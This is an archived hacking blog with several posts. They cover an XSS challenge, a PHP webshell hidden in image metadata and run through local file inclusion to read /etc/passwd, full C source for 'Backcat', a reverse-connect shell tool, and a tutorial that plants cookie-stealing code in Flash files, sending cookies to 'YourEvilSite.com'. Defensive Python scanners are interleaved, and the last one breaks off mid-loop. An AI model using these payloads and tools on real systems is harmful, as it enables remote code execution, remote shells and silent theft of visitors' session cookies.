Hackers2DevNull - Hacking To Learn | Learning To Defend<br />
<b>r0ng's XSS Challenges - Challenge 3</b> (published 2013-12-18)<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/8rz3DBZ.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i.imgur.com/8rz3DBZ.png" height="286" width="640" /></a></div>
XSS Challenge is back, challenge No. 3!<br />
<br />
<br />
<a name='more'></a><br />
Link: <a href="http://dfu123.comule.com/xsschallenge3.php">http://dfu123.comule.com/xsschallenge3.php</a><br />
<br />
Challenge: Create a pop-up message with your name! Post a comment with the vector; I moderate the comments, so I will see it and add your name to the solvers list:<br />
<br />
<b>Solvers:</b><br />
smiegles<br />
<a href="https://plus.google.com/+RafayBaloch/posts" target="_blank">Rafay Baloch</a><br />
<br />
//Thanks to <a href="http://www.blogger.com/profile/17178762421947730931">gopal patel</a> for your suggestion.<br />
//Matius, the vector you posted didn't work :/ Latest Firefox.<br />
//<a href="http://www.blogger.com/profile/05386415187257615577">CodeFusion</a>, your vector doesn't work: parentheses are escaped.<br />
<br />
<br /><b>LFI vulnerability + image upload form? You got Remote Code Execution!</b> (published 2013-10-31)<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/xHdYujh.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="202" src="http://i.imgur.com/xHdYujh.jpg" width="320" /></a></div>
An easy RCE when you find an LFI vulnerability and are able to upload images (or any other file) to the website.<br />
<br />
<a name='more'></a><br />
<br />
I recently came across a forum post where a website admin's site had been hacked and he found this in his PHP error logs:<br />
<br />
<span style="background-color: #cccccc;">[error] [client 113.1.1.1]
PHP Warning: Unexpected character in input: '\x01' (ASCII=1) state=0 in
/var/www/html/photo/123.gif : eval()'d code on line 1, referer:
site.com </span><br />
<br />
This reminded me of the technique I illustrated in this blog post where php code could be smuggled into real images: <a href="http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html">http://hackers2devnull.blogspot.co.uk/2013/05/how-to-shell-server-via-image-upload.html</a>.<br />
<br />
That method, however, depends on the uploaded file's extension actually being interpreted as PHP, which relies on insecure upload code. Direct access to the /photo/ folder was also blocked in the httpd.conf file:<br />
<br />
<span style="background-color: #cccccc;"><Directory /var/www/html/photo><br />
Order Deny,Allow<br />
Deny from All<br />
</Directory></span><br />
<br />
So how was it done? Here is one possible explanation: <b>RCE via LFI/image upload</b> (which assumes there is a local file inclusion vulnerability somewhere else on the website):<br />
<br />
The photo folder isn't accessible to site users; however, this restriction doesn't apply to local file includes, because include() reads the file from disk rather than going through the web server's access rules. So, assuming we can upload a 'trojanised' image to the server, we can use a local file inclusion vulnerability elsewhere on the site to include it and run arbitrary PHP code.<br />
<br />
The process is illustrated below: the following code, which passes a GET parameter to shell_exec, was inserted into a simple image (see the earlier link for how to do it).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/4re5xhE.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="1" src="http://i.imgur.com/4re5xhE.jpg" /></a></div>
<br />
Left: the code below, inserted into the image's comment metadata field.<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?</span><span style="color: #7ac07c;">if(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'r0ng'</span><span style="color: #7ac07c;">]){echo</span><span style="color: #ff99ff;">"<pre>"</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">shell_exec</span><span style="color: #7ac07c;">(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">"r0ng"</span><span style="color: #7ac07c;">]);}</span><span style="color: #66ccff;">?></span></code></span></div>
</div>
<br />
<br />
<br />
<br />
<br />
In the document root we have an insecure (to say the least) PHP file that is vulnerable to local file inclusion:<br />
<br />
<div class="body">
<div dir="ltr">
<span style="background-color: black;"><code><span style="color: #66ccff;"><?php</span><span style="color: #7ac07c;"> include(</span><span style="color: #66ccff;">$_GET</span><span style="color: #7ac07c;">[</span><span style="color: #ff99ff;">'file'</span><span style="color: #7ac07c;">]);</span><span style="color: #66ccff;">?></span></code></span></div>
<div dir="ltr">
</div>
</div>
<br />
The result, by including the path to the image, is RCE:<br />
<br />
<span style="background-color: #cccccc;"><b>http://vulnsite.com/includes.php?file=forum/images/shellexec.jpg&r0ng=cat /etc/passwd </b></span><br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/BELKYUU.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="http://i.imgur.com/BELKYUU.png" width="640" /></a></div>
<br />
Any errors in the code inserted into the image are reported as PHP errors attributed to the image file itself rather than to the including script, which would explain the odd error the website admin reported.<br />
<span style="font-style: italic;">Caveat: this obviously depends on the severity of the LFI vulnerability, namely whether it can include a file with a non-PHP extension.</span><br />
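As an added defender-side example (not code from the original post), here is an upload-time check in Python that walks a JPEG's header segments and flags a PHP open tag inside the COM or APPn metadata, which is exactly where the payload above was hidden. The JPEG bytes are constructed inline, and the allowlist for XMP's "<?xpacket" prefix is my assumption.

```python
import re
import struct

# Any PHP open tag in metadata is suspect: "<?php", "<?=", and with
# short_open_tag enabled even a bare "<?" (the post's payload starts "<?if").
# XMP packets legitimately begin with "<?xpacket", so that one word is
# allowlisted (assumption for this example); everything else after "<?" is flagged.
PHP_TAG_RE = re.compile(rb"<\?(?!xpacket\b)")

SOI, EOI, SOS, COM = 0xD8, 0xD9, 0xDA, 0xFE
APP_MARKERS = range(0xE0, 0xF0)                    # APP0..APP15 (EXIF is APP1, IPTC is APP13)
STANDALONE = set(range(0xD0, 0xD8)) | {0x01, SOI}  # markers that carry no length field


def iter_jpeg_segments(data):
    """Yield (marker, payload) for every JPEG header segment up to Start Of Scan.

    Raises ValueError on anything malformed so the caller can reject the
    upload instead of guessing.
    """
    if len(data) < 4 or data[0] != 0xFF or data[1] != SOI:
        raise ValueError("not a JPEG: missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("expected marker at offset %d" % pos)
        marker = data[pos + 1]
        if marker == 0xFF:                 # fill byte before a marker
            pos += 1
            continue
        if marker in (SOS, EOI):           # image data follows; metadata is over
            return
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header at offset %d" % pos)
        (length,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("segment 0x%02X has bad length %d" % (marker, length))
        yield marker, data[pos + 4:pos + 2 + length]
        pos += 2 + length
    raise ValueError("truncated JPEG: no SOS or EOI marker found")


def find_php_in_metadata(data):
    """Return [(segment_name, snippet)] for PHP open tags found in COM/APPn
    segments; an empty list means the metadata looks clean."""
    hits = []
    for marker, payload in iter_jpeg_segments(data):
        if marker == COM:
            name = "COM"
        elif marker in APP_MARKERS:
            name = "APP%d" % (marker - 0xE0)
        else:
            continue                       # DQT, SOF, DHT... carry no free text
        m = PHP_TAG_RE.search(payload)
        if m:
            hits.append((name, payload[m.start():m.start() + 32]))
    return hits


def build_jpeg(comment=b"", app1=b""):
    """Constructed test fixture: a structurally valid JPEG header with the
    given COM and APP1 payloads, followed by an empty scan. Not a real image."""
    def seg(marker, payload):
        return b"\xff" + bytes([marker]) + struct.pack(">H", len(payload) + 2) + payload
    out = b"\xff\xd8"
    if app1:
        out += seg(0xE1, app1)
    if comment:
        out += seg(COM, comment)
    out += seg(0xDB, b"\x00" * 65)         # a DQT segment, filler only
    return out + b"\xff\xda\x00\x02" + b"\xff\xd9"


# Constructed samples: a clean file, one carrying the post's style of short-tag
# payload in the comment field, and one with a legitimate XMP packet in APP1.
CLEAN_JPEG = build_jpeg(comment=b"Created with an ordinary camera")
TROJANISED_JPEG = build_jpeg(comment=b"<?if($_GET['x']){/* constructed */}?>")
XMP_JPEG = build_jpeg(app1=b"http://ns.adobe.com/xap/1.0/\x00<?xpacket begin='' id='W5M0'?>")

if __name__ == "__main__":
    for label, blob in (("clean", CLEAN_JPEG), ("trojanised", TROJANISED_JPEG), ("xmp", XMP_JPEG)):
        print(label, find_php_in_metadata(blob))
```

Rejecting on ValueError matters as much as the tag check: a file the parser cannot walk is not one you want include() to read either.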
<br />
<br />
(If you find this useful, why not check out an advert below to support the blog? :O )<b> </b><span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<b>[Release!] Backcat - Back-connect Utility [*nix]</b> (published 2013-10-23)<div class="separator" style="clear: both; text-align: center;">
<a href="http://i.imgur.com/KYt0Osx.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://i.imgur.com/KYt0Osx.jpg" width="320" /></a></div>
<br />
[<b><span style="color: blue;">+</span></b>] Outline:<br />
A simple utility for making life easier when back-connecting from a foreign host where the firewall rules are not known. Run one copy locally, specifying a port range to listen on (optionally also a program to hand the connection to). On the remote host (the one you are connecting back from), run another copy specifying the destination port range to try in turn, effectively 'brute-forcing' an open egress port (optionally a local port range to bind to instead of taking the first available port, and optionally a program to pass the connection to, e.g. "/bin/sh -i").<br />
<br />
<br />
<a name='more'></a>[<b><span style="color: blue;">+</span></b>] Notes:<br />
The port range is limited to 1024 per process because select() is used instead of poll(). The reason is that debugging poll() on older distros gives me a headache!<br />
<br />
[<b><span style="color: blue;">+</span></b>] C source:<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"> <code style="color: black; word-wrap: normal;">
/* #####################################
* BACKCAT::Back-connect Utility
* Ver: 0.2 | OS: *nix | by: r0ng
* (Hackers2devnull.blogspot.co.uk)
* #####################################
*/
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/resource.h>
#include <sys/select.h> /* select(), fd_set */
#include <fcntl.h>
#include <unistd.h>
#include <getopt.h>
#include <string.h>
#include <stdio.h>
#include <errno.h>
#include <dirent.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/tcp.h>
#define VERSION "0.2"
static int silent = 0;
static void print_help ()
{
printf ("BACKCAT::Back-connect Utility v%s\n\n", VERSION);
printf ("Options:\n"
" -m, --mode=client|server start application as \"client\" (bind and connect) or as \"server\" (bind and listen)\n"
" -h, --host host to connect to\n"
" -p, --port port or ports range. Example: -p 2000-3000\n"
" -b, --bind port to bind or ports bind range (by default use the first available port). Example: -b 5000-6000\n"
" -r, --run=PROGRAM program to exec after connect\n"
" -s, --silent suppress any output\n"
" --version display version information and exit\n"
" --help display this help and exit\n"
" Example (remote host): ./backcat -m client -h yourip -p 2000-3000 -r \"/bin/sh -i\" \n"
" Example (local host) : ./backcat -m server -p 2000-3000 \n"
);
printf ("\n");
}
/* Parse "N" or "N-M" into start/end ports; returns 0 if no number was found
 * or a value is outside the valid TCP port range, so main() can bail out. */
static int parse_ports (const char *range, int *start_port, int *end_port)
{
char *next;
*start_port = strtol (range, &next, 10);
if (next == range || *start_port < 1 || *start_port > 65535)
return 0;
if (next && next[0] == '-') {
*end_port = strtol (next + 1, NULL, 10);
if (*end_port < 1 || *end_port > 65535)
return 0;
}
return 1;
}
static void exec_app (char *app, int fd)
{
char *p, *tmp;
printf ("Passing control to the specified program \n");
/* wire the connected socket to the program's stdin/stdout/stderr */
dup2(fd, 0);
dup2(fd, 1);
dup2(fd, 2);
/* split "prog arg" at the first space: a single argument is supported */
p = strstr (app, " ");
tmp = strstr (app, " ");
if (p)
p++;
if (tmp)
*tmp = '\0';
execlp(app, app, p, NULL);
/* only reached if execlp() failed */
perror ("execlp");
_exit (1);
}
int is_in_array (int *array, int array_len, int item)
{
int i;
/* array_len entries: indices 0 .. array_len-1 */
for (i = 0; i < array_len; i++) {
if (array[i] == item)
return 1;
}
return 0;
}
static void run_server (int start_port, int end_port, const char *app)
{
int i, j;
int total_ports = (end_port - start_port) + 1;
int *sockets;
int yes=1;
fd_set master;
fd_set read_fds;
int fdmax;
socklen_t addrlen;
struct sockaddr_storage remoteaddr;
int newfd;
char remote_ip[100];
int nbytes;
int fd_stdin;
int read_ret = 0, write_ret;
unsigned char buf[1024];
int accepted_fd = 0;
int flag = 1;
sockets = malloc (sizeof (int) * total_ports);
FD_ZERO(&master);
FD_ZERO(&read_fds);
fd_stdin = STDIN_FILENO;
fdmax = 1 + fd_stdin;
j = 0;
for (i = start_port; i <= end_port; i++) {
struct sockaddr_in name;
sockets[j] = socket (AF_INET, SOCK_STREAM, 0);
if (sockets[j] < 0) {
printf ("error: could not create socket. %s\n", strerror (errno));
return;
}
setsockopt (sockets[j], SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));
memset (&name, 0, sizeof (name));
name.sin_family = AF_INET;
name.sin_port = htons (i);
name.sin_addr.s_addr = htonl (INADDR_ANY);
if (bind (sockets[j], (struct sockaddr *) &name, sizeof (name)) < 0) {
printf ("error: could not bind socket on port %d. %s\n", i, strerror (errno));
return;
}
if (listen (sockets[j], 128) == -1) {
printf ("error: could not listen on port %d. %s\n", i, strerror (errno));
return;
}
FD_SET(sockets[j], &master);
fdmax = sockets[j];
j++;
}
if (!silent)
printf ("Server is listening on %d ports\n", total_ports);
FD_SET(fd_stdin, &master);
while (1) {
read_fds = master;
if (select (fdmax + 1, &read_fds, NULL, NULL, NULL) == -1) {
printf ("error: select () failed. %s\n", strerror (errno));
continue;
}
for (i = 0; i <= fdmax; i++) {
if (FD_ISSET(i, &read_fds)) {
if (i == fd_stdin) {
read_ret = read(fd_stdin, buf, sizeof(buf));
/* forward local keyboard input to the connected peer; skip on EOF/error */
if (read_ret > 0 && accepted_fd) {
if (send (accepted_fd, buf, read_ret, 0) == -1) {
printf ("error: send () failed. %s\n", strerror (errno));
}
read_ret = 0;
}
} else if (is_in_array (sockets, total_ports, i)) {
addrlen = sizeof remoteaddr;
newfd = accept (i, (struct sockaddr *)&remoteaddr, &addrlen);
if (newfd == -1) {
printf ("error: accept () failed. %s\n", strerror (errno));
} else {
FD_SET(newfd, &master);
if (newfd > fdmax) {
fdmax = newfd;
}
int result = setsockopt(newfd, IPPROTO_TCP, TCP_NODELAY, (char *) &flag, sizeof(int));
if (!silent)
printf("new connection from %s:%d on socket %d\n",
inet_ntop(remoteaddr.ss_family,
&(((struct sockaddr_in*)&remoteaddr)->sin_addr),
remote_ip, 100),
ntohs (((struct sockaddr_in*)&remoteaddr)->sin_port),
newfd);
accepted_fd = newfd;
}
} else {
/* read at most sizeof buf - 1 so the NUL terminator added below stays in bounds */
if ((nbytes = recv(i, buf, sizeof buf - 1, 0)) <= 0) {
if (nbytes == 0) {
if (!silent)
printf("socket %d closed\n", i);
} else {
printf ("socket %d, %s\n", i, strerror (errno));
}
close(i);
FD_CLR(i, &master);
accepted_fd = 0;
} else {
buf[nbytes] = '\0';
printf ("%s\n", buf);
}
}
}
}
}
}
static int run_client (char *host, int start_port, int end_port, int bind_port, char *app)
{
int i, numbytes;
int sockfd;
char out_buf[] = "magictoken";
char in_buf[1024];
int yes=1;
struct linger fix_ling;
for (i = start_port; i <= end_port; i++) {
struct sockaddr_in sa_dst;
if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
printf ("error: could not create socket. %s\n", strerror (errno));
continue;
}
fix_ling.l_onoff = 1;
fix_ling.l_linger = 0;
setsockopt(sockfd, SOL_SOCKET, SO_LINGER, &fix_ling, sizeof(fix_ling));
setsockopt (sockfd, SOL_SOCKET, SO_REUSEADDR, &yes, sizeof(int));
if (bind_port > -1) {
struct sockaddr_in name;
memset (&name, 0, sizeof (struct sockaddr_in));
name.sin_family = AF_INET;
name.sin_port = htons (bind_port);
name.sin_addr.s_addr = htonl (INADDR_ANY);
if (bind (sockfd, (struct sockaddr *) &name, sizeof (struct sockaddr)) < 0) {
if (!silent)
printf ("error: could not bind socket on port %d. %s\n", bind_port, strerror (errno));
return 0;
}
}
memset(&sa_dst, 0, sizeof(struct sockaddr_in));
sa_dst.sin_family = AF_INET;
sa_dst.sin_port = htons (i);
sa_dst.sin_addr.s_addr = inet_addr (host);
if (connect(sockfd, (struct sockaddr *)&sa_dst, sizeof(struct sockaddr)) == -1) {
close(sockfd);
continue;
}
if (!silent) {
struct sockaddr_in sin;
socklen_t addrlen = sizeof(sin);
int local_port = 0;
if (getsockname (sockfd, (struct sockaddr *)&sin, &addrlen) == 0 &&
sin.sin_family == AF_INET &&
addrlen == sizeof(sin))
{
local_port = ntohs(sin.sin_port);
}
printf("Connection establish. Local-Port:%d Remote-Port:%d\n", local_port, i);
}
if (app) {
exec_app (app, sockfd);
return 1;
} else {
if ((numbytes = send (sockfd, out_buf, strlen (out_buf), 0)) == -1) {
printf ("error: send () failed. %s\n", strerror (errno));
close(sockfd);
continue;
}
if (!silent)
printf("client sent %d bytes: %s\n", numbytes, out_buf);
if ((numbytes = recv(sockfd, in_buf, sizeof (in_buf) -1, 0)) == -1) {
printf ("error: recv () failed. %s\n", strerror (errno));
close (sockfd);
continue;
}
in_buf[numbytes] = '\0';
if (!silent)
printf("client received %d bytes: %s\n", numbytes, in_buf);
close(sockfd);
if (!strcmp (in_buf, out_buf))
return 1;
}
}
return 0;
}
static void run_clients (char *host, int start_port, int end_port, int start_bind, int end_bind, char *app)
{
if (start_bind == -1) {
if (run_client (host, start_port, end_port, -1, app))
return;
} else {
int i;
for (i = start_bind; i <= end_bind; i++) {
if (run_client (host, start_port, end_port, i, app))
return;
}
}
if (!silent)
printf ("Failed to establish connection!\n");
}
int main (int argc, char *argv[])
{
int start_port = -1;
int end_port = -1;
int start_bind = -1;
int end_bind = -1;
int ch; /* getopt_long() returns int; a char could never compare equal to -1 where char is unsigned */
int option_index = 0;
char *host = NULL;
char *mode = NULL;
char *app = NULL;
static const struct option long_options[] = {
{"mode", required_argument, NULL, 'm'},
{"host", required_argument, NULL, 'h'},
{"port", required_argument, NULL, 'p'},
{"bind", required_argument, NULL, 'b'},
{"run", required_argument, NULL, 'r'},
{"silent", no_argument, NULL, 's'},
{"version", no_argument, NULL, 1},
{"help", no_argument, NULL, 0},
{0, 0, 0, 0}
};
if (argc < 2) {
print_help ();
return 0;
}
while ((ch = getopt_long (argc, argv, "m:h:p:b:r:s", long_options, &option_index)) != -1) {
switch (ch) {
case 'm':
mode = strdup (optarg);
break;
case 'h':
host = strdup (optarg);
break;
case 'p':
if (parse_ports (optarg, &start_port, &end_port) == 0) {
printf ("Failed to parse port range \"%s\". Exiting.\n", optarg);
return 1;
}
break;
case 'b':
if (parse_ports (optarg, &start_bind, &end_bind) == 0) {
printf ("Failed to parse port range \"%s\". Exiting.\n", optarg);
return 1;
}
break;
case 'r':
app = strdup (optarg);
break;
case 's':
silent = 1;
break;
case 1:
fprintf (stdout, "BACKCAT::Back-connect Utility v%s\n", VERSION);
fprintf (stdout, "By ~r0ng (Hackers2devnull.blogspot.co.uk)\n");
return 0;
case 0:
print_help ();
return 0;
default:
print_help ();
return 0;
}
}
if (mode == NULL) {
printf ("\"mode\" parameter is not specified! Please specify either \"client\" or \"server\". Exiting.\n");
return 1;
}
if (strcmp (mode, "client") && strcmp (mode, "server")) {
printf ("Invalid \"mode\" parameter! Please specify either \"client\" or \"server\". Exiting.\n");
return 1;
}
if (start_port == -1) {
printf ("Port or port range is not specified! Exiting.\n");
return 1;
}
if (end_port > -1 && end_port < start_port) {
printf ("Incorrect port range specified! Exiting.\n");
return 1;
}
if (end_bind > -1 && end_bind < start_bind) {
printf ("Incorrect port range specified! Exiting.\n");
return 1;
}
if (end_port == -1)
end_port = start_port;
if (end_bind == -1)
end_bind = start_bind;
if (!strcmp (mode, "server")) {
run_server (start_port, end_port, app);
} else if (!host) {
printf ("\"host\" is not specified. Exiting.\n");
} else {
run_clients (host, start_port, end_port, start_bind, end_bind, app);
}
return 0;
}
</code>
</pre>
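An added detection example, not part of the Backcat release: the client above walks a destination port range one port at a time, so from the egress firewall's side it looks like one internal host hitting consecutive ports on one external address. This Python script (the log line format, thresholds and sample lines are assumptions constructed for the example) groups such attempts per source/destination pair, flags runs of consecutive ports inside a time window, and reports which port the firewall allowed out.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed log format for this example (one connection attempt per line);
# adapt LINE_RE to whatever your firewall or flow collector actually emits.
LINE_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) proto=tcp action=(?P<action>allow|deny)$"
)


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "src": m["src"],
            "dst": m["dst"], "dport": int(m["dport"]), "action": m["action"]}


def longest_consecutive_run(ports):
    """Return (length, start) of the longest run of consecutive port numbers."""
    best_len, best_start = 0, None
    for p in ports:
        if p - 1 in ports:
            continue                       # only measure from a run's first port
        n = 1
        while p + n in ports:
            n += 1
        if n > best_len:
            best_len, best_start = n, p
    return best_len, best_start


def find_port_sweeps(lines, min_run=8, window_seconds=60):
    """Flag (src, dst) pairs that walked at least `min_run` consecutive ports
    within `window_seconds`, and report which of those ports were allowed out,
    since that is the port a back-connect would end up using."""
    by_pair = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            by_pair[(rec["src"], rec["dst"])].append(rec)
    alerts = []
    for (src, dst), recs in by_pair.items():
        recs.sort(key=lambda r: r["ts"])
        best = None
        for i in range(len(recs)):
            j = i
            while j < len(recs) and (recs[j]["ts"] - recs[i]["ts"]).total_seconds() <= window_seconds:
                j += 1
            window = recs[i:j]
            run_len, start = longest_consecutive_run({r["dport"] for r in window})
            if run_len >= min_run and (best is None or run_len > best["run_length"]):
                best = {"src": src, "dst": dst, "start_port": start, "run_length": run_len,
                        "span_seconds": (window[-1]["ts"] - window[0]["ts"]).total_seconds(),
                        "allowed_ports": sorted({r["dport"] for r in window if r["action"] == "allow"})}
        if best:
            alerts.append(best)
    return alerts


# Constructed sample: 10.0.0.5 walks ports 2000-2011 on one host within 12 seconds,
# with the firewall letting only 2009 out, next to ordinary web traffic from another host.
SAMPLE_LOG = [
    "2013-10-23T13:58:%02d src=10.0.0.5 dst=203.0.113.7 dport=%d proto=tcp action=%s"
    % (s, p, "allow" if p == 2009 else "deny")
    for s, p in enumerate(range(2000, 2012))
] + [
    "2013-10-23T13:58:03 src=10.0.0.8 dst=198.51.100.2 dport=443 proto=tcp action=allow",
    "2013-10-23T13:58:04 src=10.0.0.8 dst=198.51.100.2 dport=80 proto=tcp action=allow",
    "2013-10-23T13:58:05 src=10.0.0.8 dst=198.51.100.2 dport=443 proto=tcp action=allow",
]

if __name__ == "__main__":
    for alert in find_port_sweeps(SAMPLE_LOG):
        print(alert)
```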
<br />
<span style="color: #3d85c6;"><b>~r0ng</b></span><br />
<b>How to hide XSS in flash movies/games</b> (published 2013-09-25)<div class="post_body" id="pid_35379975">
<div style="text-align: center;">
<img alt="[Image: Adobe-moves-to-patch-zero-day-XSS-vulner...ge2_70.jpg]" border="0" src="http://www.thetechherald.com/media/images/201148/Adobe-moves-to-patch-zero-day-XSS-vulnerability-Image2_70.jpg" height="305" width="320" /></div>
<br />
Here is a tutorial on how to rip and edit an existing flash movie/game
for use in XSS attacks. The objective is to steal cookies silently
without changing the flash movie's behavior from the perspective of the
user.</div>
<div class="post_body" id="pid_35379975">
<a name='more'></a><br />
<br />
<span style="color: deepskyblue;">Intro</span><br />
When a site allows you to upload .swf (Flash) files, or to embed a Flash file as an object, it may be possible to create an XSS vulnerability as long as the parameter allowScriptAccess=<span style="font-weight: bold;">never</span> is not specified in the embed code.<br />
<br />
<span style="color: deepskyblue;">Some tools needed:</span><br />
<ul>
<li>A SWF file decompiler (<a href="http://www.sothink.com/product/flashdecompiler/" target="_blank">link</a>) (note: I have the full version, the demo is limited)</li>
<li>A FLA editor (I use Adobe Flash CS6)</li>
</ul>
<br />
<span style="color: deepskyblue;">Concept:</span><br />
Through ActionScript, Flash's scripting language, calls can be made to external JavaScript in the markup, including arbitrary functions. We will inject some cookie-stealing code into an existing ActionScript function after decompiling it, then recompile it. This works on the major browsers and is compatible with ActionScript 2 and 3 (the latest version).<br />
<br />
<span style="color: deepskyblue;">Step 1:</span><br />
Navigate to a page where a Flash movie or game loads, and either check the page source for the URL of the Flash file (ending in .swf) or, as shown below, use Firefox's Tools > Page Info > Media and save the file to download it.<br />
<img alt="[Image: ZrZOvyt.png]" border="0" src="http://i.imgur.com/ZrZOvyt.png" height="243" width="640" /><br />
<br />
<span style="color: deepskyblue;">Step 2:</span><br />
Once you have the Sothink decompiler, open the file you just downloaded and export it as a .fla file:<br />
<br />
<img alt="[Image: iKBfvXO.png]" border="0" src="http://i.imgur.com/iKBfvXO.png" /><br />
<br />
<span style="color: deepskyblue;">Step 3:</span><br />
Open the .fla file in your editor (Adobe Flash CS6 in my case), select the first frame of the movie and right-click > Actions. This will bring up the ActionScript editor.<br />
<br />
<img alt="[Image: bxg3iC6.png]" border="0" src="http://i.imgur.com/bxg3iC6.png" /><br />
<br />
<span style="color: deepskyblue;">Step 4:</span><br />
Find the beginning of the ActionScript for the 'scene' and, before any other code, paste the following:<br />
<br />
<div class="codeblock phpcodeblock">
<div class="title">
<br /></div>
<div class="body">
<div dir="ltr">
<code><span style="background-color: black;"><span style="color: #66ccff;">flash</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">external</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">ExternalInterface</span><span style="color: #7ac07c;">.</span><span style="color: #66ccff;">call</span><span style="color: #7ac07c;">(</span><span style="color: #ff99ff;">"eval"</span><span style="color: #7ac07c;">, </span><span style="color: #ff99ff;">"var a = new XMLHttpRequest(); a.open('get', 'http://YourEvilSite.com/logger.php?cookie=' + document.cookie); a.send();"</span></span><span style="color: #7ac07c;"><span style="background-color: black;">); </span></span></code></div>
</div>
</div>
<br />
<img alt="[Image: veZhfdm.png]" border="0" src="http://i.imgur.com/veZhfdm.png" height="104" width="400" /><br />
<br />
<span style="color: deepskyblue;">Step 5:</span><br />
<br />
From the File drop down, select export as movie:<br />
<br />
<img alt="[Image: yKEytXE.png]" border="0" src="http://i.imgur.com/yKEytXE.png" height="99" width="640" /><br />
<br />
<span style="color: deepskyblue;">Step 6:</span><br />
<br />
The file is now ready to be uploaded to, or embedded on, your target site. It should operate as normal, but behind the scenes whoever accesses it will have their cookies stolen. May I recommend a cookie catcher I prepared earlier? (<a href="http://hackers2devnull.blogspot.co.uk/2013/08/r0ngs-cookie-logger-script-for-silently.html" target="_blank">link</a>).<br />
<br />
<img alt="[Image: D9O2Al6.png]" border="0" src="http://i.imgur.com/D9O2Al6.png" height="189" width="320" /><br />
<img alt="[Image: ukRbpVM.png]" border="0" src="http://i.imgur.com/ukRbpVM.png" height="96" width="640" /><br />
<br />
Demo (cookie stealing code replaced with alert box): <a href="http://dfu123.comule.com/swfxss.swf" target="_blank">http://dfu123.comule.com/swfxss.swf</a></div>
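An added defender-side example, not the post's code: because a decompiled and recompiled SWF keeps ActionScript strings such as ExternalInterface, eval and document.cookie as plain UTF-8 in its constant pool, an upload handler can inflate the SWF container and search for them before accepting the file. The container handling follows the SWF signatures FWS/CWS/ZWS; the indicator list and the sample movies are constructed for this example and are assumptions, not a complete rule set.

```python
import struct
import zlib

# Strings the injected ActionScript from the post would leave in the SWF's
# constant pool (AS2 DoAction and AS3 ABC both store strings as plain UTF-8).
# Heuristic list constructed for this example; extend it for your environment.
SUSPICIOUS = (b"ExternalInterface", b"eval", b"document.cookie",
              b"XMLHttpRequest", b"getURL", b"javascript:")


def swf_body(data):
    """Return the uncompressed SWF body (everything after the 8-byte header).

    FWS = uncompressed, CWS = zlib-compressed (SWF 6+), ZWS = LZMA (SWF 13+,
    not handled here: reject rather than silently pass it).
    """
    if len(data) < 8:
        raise ValueError("too short to be a SWF")
    sig = data[:3]
    (declared_len,) = struct.unpack("<I", data[4:8])  # uncompressed length incl. header
    if sig == b"FWS":
        body = data[8:]
    elif sig == b"CWS":
        body = zlib.decompress(data[8:])
    elif sig == b"ZWS":
        raise ValueError("LZMA-compressed SWF: not supported by this scanner")
    else:
        raise ValueError("not a SWF: signature %r" % sig)
    if len(body) + 8 != declared_len:
        raise ValueError("header says %d bytes, body has %d" % (declared_len, len(body) + 8))
    return body


def scan_swf(data):
    """Return the suspicious strings present in the SWF, in SUSPICIOUS order;
    an empty list means the heuristic found nothing."""
    body = swf_body(data)
    return [s.decode() for s in SUSPICIOUS if s in body]


def build_swf(payload, compress=True):
    """Constructed fixture: a SWF container (version 10) around `payload`.
    It is structurally a SWF but carries no real movie."""
    header = (b"CWS" if compress else b"FWS") + bytes([10]) + struct.pack("<I", len(payload) + 8)
    return header + (zlib.compress(payload) if compress else payload)


# Constructed samples: a movie whose only script string is gotoAndPlay, and the
# same container after an ExternalInterface.call("eval", ...) style injection.
# The leading bytes are a 550x400 RECT, 24 fps frame rate and frame count.
BENIGN_SWF = build_swf(b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x18\x01\x00gotoAndPlay\x00")
INJECTED_SWF = build_swf(b"\x78\x00\x05\x5f\x00\x00\x0f\xa0\x00\x00\x18\x01\x00"
                         b"flash.external.ExternalInterface\x00call\x00eval\x00"
                         b"document.cookie\x00gotoAndPlay\x00")

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_SWF), ("injected", INJECTED_SWF)):
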